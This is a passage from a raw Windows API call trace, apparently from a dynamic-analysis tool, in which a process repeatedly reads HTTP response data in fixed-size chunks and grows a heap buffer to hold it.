hRequest=0x71cad70, lpBuffer=0x8153080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8153080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.158] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xc8000) returned 0x8090080 [0109.158] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8155880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8155880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.158] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xca800) returned 0x8090080 [0109.158] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8158080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8158080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.159] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xcd000) returned 0x8090080 [0109.159] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x815a880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x815a880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.159] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xcf800) returned 0x8090080 [0109.159] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x815d080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x815d080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.160] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xd2000) returned 0x8090080 [0109.160] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x815f880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x815f880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.160] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xd4800) returned 0x8090080 [0109.160] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8162080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8162080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.160] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xd7000) returned 0x8090080 [0109.160] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8164880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8164880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.161] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xd9800) returned 0x8090080 [0109.161] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8167080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8167080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.161] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8090080, Size=0xdc000) returned 0x8300080 [0109.169] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83d9880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83d9880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.170] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xde800) returned 0x8300080 [0109.170] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83dc080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83dc080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.170] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xe1000) returned 0x8300080 [0109.170] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83de880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83de880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.171] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xe3800) returned 0x8300080 [0109.171] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83e1080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83e1080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.171] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xe6000) returned 0x8300080 [0109.171] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83e3880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83e3880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.172] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xe8800) returned 0x8300080 [0109.172] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83e6080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83e6080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.172] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xeb000) returned 0x8300080 [0109.172] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83e8880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83e8880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.173] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xed800) returned 0x8300080 [0109.173] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83eb080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83eb080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.173] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xf0000) returned 0x8300080 [0109.173] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83ed880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83ed880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.174] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xf2800) returned 0x8300080 [0109.174] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83f0080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83f0080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.175] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xf5000) returned 0x8300080 [0109.175] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83f2880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83f2880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.175] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xf7800) returned 0x8300080 [0109.175] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83f5080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83f5080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.175] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xfa000) returned 0x8300080 [0109.176] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83f7880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83f7880*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.176] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xfc800) returned 0x8300080 [0109.176] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x83fa080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x83fa080*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.176] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8300080, Size=0xff000) returned 0x8500040 [0109.218] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x85fc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x85fc840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.243] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x101800) returned 0x8600040 [0109.263] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86ff040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86ff040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.264] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8600040, Size=0x104000) returned 0x8710040 [0109.288] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8811840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8811840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.289] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8710040, Size=0x106800) returned 0x8500040 [0109.310] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8604040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8604040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.310] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x109000) returned 0x8610040 [0109.330] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8716840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8716840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.331] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8610040, Size=0x10b800) returned 0x8500040 [0109.352] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8609040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8609040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.379] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x10e000) returned 0x8610040 [0109.401] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x871b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x871b840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.402] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8610040, Size=0x110800) returned 0x8720040 [0109.422] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x882e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x882e040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.422] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8720040, Size=0x113000) returned 0x8500040 [0109.452] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8610840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8610840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.452] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x115800) returned 0x8620040 [0109.478] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8733040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8733040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.478] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8620040, Size=0x118000) returned 0x8500040 [0109.529] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8615840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8615840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.532] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x11a800) returned 0x8620040 [0109.554] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8738040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8738040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.562] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8620040, Size=0x11d000) returned 0x8500040 [0109.586] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x861a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x861a840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.596] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x11f800) returned 0x8620040 [0109.642] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x873d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x873d040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.642] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8620040, Size=0x122000) returned 0x8740040 [0109.667] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x885f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x885f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.667] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8740040, Size=0x124800) returned 0x8500040 [0109.692] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8622040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8622040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.693] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x127000) returned 0x8630040 [0109.722] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8754840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8754840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.723] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8630040, Size=0x129800) returned 0x8500040 [0109.752] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8627040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8627040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.779] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x12c000) returned 0x8630040 [0109.802] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8759840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8759840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.802] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8630040, Size=0x12e800) returned 0x8500040 [0109.827] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x862c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x862c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.827] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x131000) returned 0x8630040 [0109.851] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x875e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x875e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.852] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8630040, Size=0x133800) returned 0x8770040 [0109.875] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88a1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88a1040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.876] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8770040, Size=0x136000) returned 0x8500040 [0109.925] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8633840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8633840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.926] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x138800) returned 0x8640040 [0109.951] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8776040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8776040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.952] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8640040, Size=0x13b000) returned 0x8500040 [0109.975] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8638840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8638840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0109.976] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x13d800) returned 0x8640040 [0110.001] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x877b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x877b040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.001] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8640040, Size=0x140000) returned 0x8780040 [0110.025] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88bd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88bd840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.048] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8780040, Size=0x142800) returned 0x8500040 [0110.085] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8640040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8640040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.086] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x145000) returned 0x8650040 [0110.110] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8792840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8792840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.111] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8650040, Size=0x147800) returned 0x8500040 [0110.134] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8645040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8645040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.135] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x14a000) returned 0x8650040 [0110.159] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8797840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8797840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.183] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8650040, Size=0x14c800) returned 0x8500040 [0110.207] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x864a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x864a040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.208] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x14f000) returned 0x8650040 [0110.235] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x879c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x879c840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.235] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8650040, Size=0x151800) returned 0x87a0040 [0110.260] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88ef040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88ef040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.260] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87a0040, Size=0x154000) returned 0x8500040 [0110.284] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8651840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8651840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.285] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x156800) returned 0x8660040 [0110.334] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87b4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87b4040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.335] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8660040, Size=0x159000) returned 0x8500040 [0110.360] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8656840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8656840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.360] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x15b800) returned 0x8660040 [0110.389] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87b9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87b9040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.391] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8660040, Size=0x15e000) returned 0x8500040 [0110.423] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x865b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x865b840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.424] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x160800) returned 0x8660040 [0110.487] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87be040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87be040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.488] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8660040, Size=0x163000) returned 0x87d0040 [0110.514] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8930840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8930840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.522] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87d0040, Size=0x165800) returned 0x8500040 [0110.553] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8663040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8663040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.553] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x168000) returned 0x8670040 [0110.582] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87d5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87d5840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.611] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8670040, Size=0x16a800) returned 0x8500040 [0110.640] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8668040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8668040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.641] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x16d000) returned 0x8670040 [0110.673] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87da840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87da840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.674] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8670040, Size=0x16f800) returned 0x8500040 [0110.703] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x866d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x866d040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.704] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x172000) returned 0x8670040 [0110.756] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87df840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87df840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.757] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8670040, Size=0x174800) returned 0x87f0040 [0110.783] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8962040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8962040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.783] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x87f0040, Size=0x177000) returned 0x8500040 [0110.810] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8674840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8674840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.811] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x179800) returned 0x8680040 [0110.838] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87f7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87f7040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.863] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8680040, Size=0x17c000) returned 0x8500040 [0110.891] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8679840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8679840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.891] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x17e800) returned 0x8680040 [0110.919] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x87fc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x87fc040*, 